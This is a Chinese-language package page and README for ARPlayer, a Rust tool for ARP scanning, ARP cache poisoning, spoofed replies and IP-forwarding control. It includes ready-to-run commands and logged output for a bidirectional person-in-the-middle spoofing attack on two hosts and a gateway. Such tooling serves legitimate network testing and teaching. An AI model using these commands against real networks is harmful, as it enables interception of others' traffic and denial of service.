3 个版本
0.1.2 | 2021 年 5 月 27 日 |
---|---|
0.1.1 | 2021 年 5 月 26 日 |
0.1.0 | 2021 年 5 月 25 日 |
#4 在 #reply
49KB
1.5K SLoC
ARPlayer
您可以使用 ARPlayer 执行涉及 ARP 的多种攻击/技术。
由于需要创建原始套接字,因此使用 ARPlayer 需要root权限。
安装
安装
$ cargo install arplayer
扫描
您可以使用 ARP 请求扫描本地网络。您可以使用 scan
命令在网络上进行 ARP 扫描。
$ sudo arplayer scan -I eth2 -w 10
192.168.100.1 52:54:00:5b:49:5d
192.168.100.2 52:54:00:0b:75:57
192.168.100.7 52:54:00:a4:8c:f2
192.168.100.5 52:54:00:76:87:bb
...
欺骗
您可以通过发送连续的 ARP 响应来中毒网络计算机的 ARP 缓存表,这些响应指示其他计算机的 MAC 与您的 IP(或您选择的某些 IP)相关联。这样,您可以执行 PitM 或 DoS 攻击,具体取决于您是否重定向流量。
您可以使用 spoof
命令执行 ARP 欺骗/中毒攻击。您需要指定受害者的 IP 地址和网关地址。默认情况下,它只会中毒受害者的缓存,但您可以使用 -b/--bidirectional
标志来中毒网关缓存。
此外,要执行 PitM 攻击,您需要启用 IP 数据包转发。您可以使用 -F/--forward
标志来执行此操作。
以下示例显示了针对 2 个受害者和网关的 PitM 攻击
$ arplayer spoof -I eth2 -b -F 192.168.100.7,192.168.100.5 192.168.100.2 -v
Spoofing - telling 192.168.100.7 (52:54:00:a4:8c:f2) that 192.168.100.2 is 52:54:00:88:80:0c (192.168.100.44) every 1.0 seconds (until Ctrl-C)
Spoofing - telling 192.168.100.5 (52:54:00:76:87:bb) that 192.168.100.2 is 52:54:00:88:80:0c (192.168.100.44) every 1.0 seconds (until Ctrl-C)
INFO - 192.168.100.2-52:54:00:88:80:0c -> 192.168.100.7-52:54:00:a4:8c:f2
INFO - 192.168.100.7-52:54:00:88:80:0c -> 192.168.100.2-52:54:00:0b:75:57
INFO - 192.168.100.2-52:54:00:88:80:0c -> 192.168.100.5-52:54:00:76:87:bb
INFO - 192.168.100.5-52:54:00:88:80:0c -> 192.168.100.2-52:54:00:0b:75:57
INFO - 192.168.100.2-52:54:00:88:80:0c -> 192.168.100.7-52:54:00:a4:8c:f2
INFO - 192.168.100.7-52:54:00:88:80:0c -> 192.168.100.2-52:54:00:0b:75:57
INFO - 192.168.100.2-52:54:00:88:80:0c -> 192.168.100.5-52:54:00:76:87:bb
INFO - 192.168.100.5-52:54:00:88:80:0c -> 192.168.100.2-52:54:00:0b:75:57
^CReadjusting 192.168.100.2 for 192.168.100.7 (52:54:00:a4:8c:f2)
Readjusting 192.168.100.2 for 192.168.100.5 (52:54:00:76:87:bb)
INFO - 192.168.100.2-52:54:00:0b:75:57 -> 192.168.100.7-52:54:00:a4:8c:f2
INFO - 192.168.100.7-52:54:00:a4:8c:f2 -> 192.168.100.2-52:54:00:0b:75:57
INFO - 192.168.100.2-52:54:00:0b:75:57 -> 192.168.100.5-52:54:00:76:87:bb
INFO - 192.168.100.5-52:54:00:76:87:bb -> 192.168.100.2-52:54:00:0b:75:57
...
回复
使用 reply
命令,您可以设置一个 ARP "监听器",它会回复任何带有您的 MAC(或自定义的 MAC)的 ARP 请求。您还可以使用参数根据源 MAC 和 IP 或请求的 IP 过滤您想要回复的 ARP 请求。
$ sudo arplayer reply -I eth0 --match-dst-ips 192.168.122.1 -v
INFO - Reply request for 192.168.122.1 from 192.168.122.83 (52:54:00:15:c9:6b)
INFO - Reply request for 192.168.122.1 from 192.168.122.138 (52:54:00:d9:d2:ca)
...
转发
您可以使用 forward
命令查看 IP 转发状态并启用/禁用它。
$ sudo arplayer forward
0
$ sudo arplayer forward -e
$ sudo arplayer forward -e -v
INFO - net.ipv4.ip_forward = 1
$ sudo arplayer forward
1
免责声明
请不要将此工具用于不良目的。我不会承担您使用此工具的行为造成的任何责任。
依赖项
~7–16MB
~194K SLoC